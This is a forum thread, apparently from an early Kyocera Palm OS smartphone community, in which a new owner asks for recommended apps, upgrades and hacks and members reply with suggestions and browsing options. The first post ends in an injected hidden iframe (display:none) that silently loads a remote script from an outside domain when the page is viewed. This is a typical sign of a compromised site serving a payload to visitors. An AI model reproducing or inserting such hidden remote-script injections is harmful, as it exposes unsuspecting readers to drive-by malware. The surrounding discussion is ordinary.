+ Reply to Thread

I just got my Kyrocera...now what?

Hello all,

I'm glad that there is a forum dedicated to this phone! I just got mine, and I'm loving it so far! I wish it were in color, but I am sure that will come in time!

So now that I have my Kyocera, what do I need to do? Are there Palm OS upgrades available? Is there a must-have application that I should get? Any good tips and tricks? Any interesting hacks?

At work, we have a wireless network. It is possible to connect to it via the Kyocera phone so that I can surf the web for free while I'm at work?

Thanks everyone! <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Michael,

The answer to all your questions is "YES"!

That said I would respectfully point you to the button in the upper right-hand corner labeled "search". Everything you mentioned as a need/interest has been discussed here in the past as others came onboard.

If you get stuck somewhere along the way please come back with specific questions, but you'll find the community in general far more receptive to your inquiry after you've taken the time to do the basic research first.

Hope that makes sense.

First thing you should go do is get a screen protector of sometype before you do anything.

You will thank me later.

The second thing you should do is to get a program called "Minutes" again search on this site for the location of it. It's a FREE program that is super! It allows you to keep track of Peak, Off Peak, M2M, and Free or incoming free minutes.

Also get set of Hack programs to add features, you will need either Hackmaster or Xmaster hack manager programs.

And replace the Kyocera Decktop that came with the phone with the free PALM 4.01 "DESKTOP" program available from the Palm site.

There that will get you started.

Have fun, :d
    Remember, When the long night comes return to the end of the beginning.

Thanks!

Thanks everyone for your input! I'm going to do some poking around on these forums to see what else others have done!

Cheers,

Michael

Re: I just got my Kyrocera...now what?

[quote:a83b814901] I just got mine, and I'm loving it so far! I wish it were in color, but I am sure that will come in time! [/quote:a83b814901]Yea, I hear you. Couple of the people I work with have m130's and the color is nice.

[quote:a83b814901] So now that I have my Kyocera, what do I need to do? Are there Palm OS upgrades available? Is there a must-have application that I should get? Any good tips and tricks? Any interesting hacks? [/quote:a83b814901]I wouldn't use the CDROM that came with the phone for anything. Use the Palm desktop 4.01 available for download from the palm website. The latest version backs up all databases so if you ever need to restore, your data is safe. No need for backupbuddy. Avantgo is a good complement to the browser that comes with the phone. I have a bundle of weekend minutes so during the week I use avantgo more. Since you just bought your phone you should have the latest Palm/Phone OS's. I stay clear of hacks, processor overclockers, and many people have had problems with the AOL applet. I need my phone for business and don't want to risk having to do a hard reset at the jobsite.

You have multiple ways of getting information off the web:
    - eudora text based browser (fast)
    - blazer or some other graphical browser (slow)
    - web clipping apps (previously called PQA's (palm querey apps)
    - WAP browser (like used in non-smartphones)
    - avantgo (as previously meantioned)

Go to palmgear.com and check out all the web clipping apps. I don't know of a list of scaled down websites you can surf live, but www.plinkit.com is one. While I can check my pop email connecting to the verizon network, to send smtp I setup the phone to call my ISP. I have DSL at home and they have free dialup access for DSL customers.

[quote:a83b814901] At work, we have a wireless network. It is possible to connect to it via the Kyocera phone so that I can surf the web for free while I'm at work? [/quote:a83b814901]No 802.11b yet. Handera's can do it with a compact flash adapter, and some palms can do it with a xircom cradle/sled.

The new sony palms would be ideal for 802.11b surfing since they have a color 320x480 screens. If the screen rotates that would be 480x320, not bad for many web sites.

does anyone know the codes to hook up a kyocera phantom?
    my phone got shut off and i need it